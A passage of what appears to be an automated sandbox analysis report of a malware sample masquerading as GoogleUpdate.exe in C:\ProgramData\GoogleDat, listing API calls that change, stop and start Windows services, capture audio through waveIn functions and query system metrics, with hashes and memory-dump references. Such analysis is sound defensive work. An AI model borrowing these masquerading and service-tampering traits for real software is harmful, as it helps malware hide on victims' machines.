                                  • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
                                  • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID:
                                • API String ID: 3950776272-0
                                • Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                • Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
                                • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                • Opcode Fuzzy Hash: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
                                • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm
                                • API String ID: 2936374016-3206640213
                                • Opcode ID: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
                                • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                • Opcode Fuzzy Hash: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
                                • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                • int.LIBCPMT ref: 0040F8D7
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040F917
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                • __Init_thread_footer.LIBCMT ref: 0040F97F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID:
                                • API String ID: 3815856325-0
                                • Opcode ID: 2a92d127d0bc41b4c1399fda7f39d698b8b2f00d2b835ce3580847fe0977fe40
                                • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                • Opcode Fuzzy Hash: 2a92d127d0bc41b4c1399fda7f39d698b8b2f00d2b835ce3580847fe0977fe40
                                • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: de625251fdb0966dd0fe602b722cfa4efd58a0a8c2be3873cbf04c67ac3ad1aa
                                • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                • Opcode Fuzzy Hash: de625251fdb0966dd0fe602b722cfa4efd58a0a8c2be3873cbf04c67ac3ad1aa
                                • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                APIs
                                • GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                • _free.LIBCMT ref: 0044575C
                                • _free.LIBCMT ref: 00445784
                                • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                • _abort.LIBCMT ref: 004457A3
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: b7b69ea1573c73a9e6f41028e4c49f338adc93ff7086ca8506b44a1cd4c8c3a5
                                • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                • Opcode Fuzzy Hash: b7b69ea1573c73a9e6f41028e4c49f338adc93ff7086ca8506b44a1cd4c8c3a5
                                • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 9eb75cef1d4b67f2c10078b5b548f78349300c808b5f133cf6c8f4936e13ccb2
                                • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                • Opcode Fuzzy Hash: 9eb75cef1d4b67f2c10078b5b548f78349300c808b5f133cf6c8f4936e13ccb2
                                • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: e85613c70ade42cc09a5e29631bc5df2b55fc78627f717a2ce68a963f994c174
                                • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                • Opcode Fuzzy Hash: e85613c70ade42cc09a5e29631bc5df2b55fc78627f717a2ce68a963f994c174
                                • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 0bca7e064012bf7647cb0938be93fbdbcf9017c0a1d18544c828a485767229c1
                                • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                • Opcode Fuzzy Hash: 0bca7e064012bf7647cb0938be93fbdbcf9017c0a1d18544c828a485767229c1
                                • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040189E
                                • ExitThread.KERNEL32 ref: 004018D6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: 7i$8:G
                                • API String ID: 1649129571-397755072
                                • Opcode ID: aa88b34fec3864d56308d90bf3a1e9e4aa9725fc2a208c8e3b87a3743ec969d4
                                • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                • Opcode Fuzzy Hash: aa88b34fec3864d56308d90bf3a1e9e4aa9725fc2a208c8e3b87a3743ec969d4
                                • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\GoogleDat\GoogleUpdate.exe,00000104), ref: 00440975
                                • _free.LIBCMT ref: 00440A40
                                • _free.LIBCMT ref: 00440A4A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\ProgramData\GoogleDat\GoogleUpdate.exe$5g
                                • API String ID: 2506810119-3182272332
                                • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0Zj
                                • API String ID: 0-907608346
                                • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: h G
                                • API String ID: 1958988193-3300504347
                                • Opcode ID: 69967f799420f26f2b02874191ad9bb2a384d5afdd26a511e67be7982d0c8c16
                                • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                • Opcode Fuzzy Hash: 69967f799420f26f2b02874191ad9bb2a384d5afdd26a511e67be7982d0c8c16
                                • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041B310
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                • GetLastError.KERNEL32 ref: 0041B335
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
                                • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                • Opcode Fuzzy Hash: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
                                • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                  • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                • _UnwindNestedFrames.LIBCMT ref: 00437631
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID: /zC
                                • API String ID: 2633735394-4132788633
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
